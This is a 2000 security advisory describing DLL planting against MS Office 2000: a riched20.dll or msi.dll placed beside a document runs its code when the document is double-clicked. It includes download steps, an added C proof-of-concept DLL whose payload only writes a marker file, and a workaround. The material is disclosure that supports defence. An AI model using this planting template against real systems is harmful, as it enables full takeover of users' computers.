
Title: Double clicking on MS Office documents
Released by: Georgi Guninski
Date: 18th September 2000
Georgi Guninski security advisory #21, 2000



Double clicking on MS Office documents from Windows Explorer may
execute arbitrary programs in some cases



Systems affected:

MS Office 2000 on Win98/Win2000; probably other applications as well



Risk: Medium

Date: 18 September 2000



Legal Notice:

This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute
it unmodified. You may not modify it and distribute it or distribute
parts of it without the author's written permission.



Disclaimer:

The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use of
the information or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this
advisory or program or any derivatives thereof.





Description:



If certain DLLs are present in the current directory and the user
double clicks on a MS Office document, or launches the document from
"Start | Run", then the DLLs are loaded and their code is executed.
When a document is opened this way the current directory of the Office
process is the directory containing the document, and on these systems
the loader searches the current directory for a DLL name ahead of the
system directory, so a planted DLL with the right name is picked up
instead of the genuine one.
This allows executing native code and may lead to taking full control
over the user's computer.
It also works on remote UNC shares.





Details:

If either of the following files:

riched20.dll

or

msi.dll

(other DLLs may also work, I don't know)

is present in the current directory, double clicking on an Office
document in that directory executes the code in DllMain() of the
planted DLL.
(Excel seems not to work with riched20.dll but works with msi.dll.)
I could not make this work from HTML and IE; if you can, please let me
know.



Demonstration:

1) Download dll1.cpp from http://www.guninski.com/dll1.cpp and build it.
   I discourage downloading native code from an unknown site, but you may
   try the compiled version at your own risk: http://www.guninski.com/dll1.dll
2) Rename dll1.dll to riched20.dll
3) Place riched20.dll in a directory of your choice
4) Close all Office applications
5) From Windows Explorer double click on an Office document (preferably
   a MS Word document) in the directory containing riched20.dll
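The following is an added, self-contained stand-in for the dll1.cpp referred to in step 1; it is not the advisory's own code. It is a DLL whose DllMain, on DLL_PROCESS_ATTACH, appends one line naming the host executable and its PID to a marker file, which is enough to prove native code ran inside the Office process without popping a window. The marker path C:\planted_dll.log and the helper name format_attach_record are assumptions of this example; the helper is kept portable so it can be checked off-box, while the DllMain part is compiled only on Windows.

```c
/* dll1.c: added proof-of-concept DLL for the DLL planting described above.
 * Not the dll1.cpp published with the advisory; written for this page.
 *
 * Build as 32-bit, because Office 2000 is a 32-bit process:
 *   i686-w64-mingw32-gcc -shared -o riched20.dll dll1.c     (MinGW)
 *   cl /LD /Fe:riched20.dll dll1.c                           (MSVC)
 * Then follow steps 2-5. The DLL exports nothing, so the host may
 * complain after DllMain has already run; that is expected.
 */
#include <stdio.h>
#include <string.h>

/* Portable helper: build the marker line DllMain writes.
 * Returns the number of characters written (excluding the NUL),
 * or -1 if buf is too small. Separate from DllMain so it can be
 * unit-tested on any platform. */
int format_attach_record(char *buf, size_t buflen,
                         const char *host_exe, unsigned long pid)
{
    int n = snprintf(buf, buflen, "planted DLL loaded by %s (pid %lu)",
                     host_exe, pid);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return n;
}

#ifdef _WIN32
#include <windows.h>

/* Assumption of this example: where the proof of execution is written. */
#define MARKER_PATH "C:\\planted_dll.log"

BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {
        char exe[MAX_PATH] = "?";
        char line[MAX_PATH + 64];
        FILE *fp;

        DisableThreadLibraryCalls(hinst);          /* no per-thread callbacks needed */
        GetModuleFileNameA(NULL, exe, sizeof exe); /* NULL = the host process image */

        if (format_attach_record(line, sizeof line, exe,
                                 (unsigned long)GetCurrentProcessId()) > 0 &&
            (fp = fopen(MARKER_PATH, "a")) != NULL) {
            fprintf(fp, "%s\n", line);
            fclose(fp);
        }
    }
    return TRUE; /* returning FALSE would make the loader unload us */
}
#endif
```

A real attacker would replace the file write with an arbitrary payload; the marker line is only there so the tester can tell which process loaded the planted DLL (e.g. WINWORD.EXE) when reproducing the Word versus Excel difference noted above.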





Workaround: Do not double click on Office documents or use "Start | Run
... office.doc". Instead start the Office application from the "Start Menu"
and then use "File | Open". Note that this only avoids the launch paths
that set the current directory to the document's directory; the DLL
search order itself is unchanged, so a planted riched20.dll or msi.dll
should still be treated as hostile wherever it is found, including on
UNC shares.









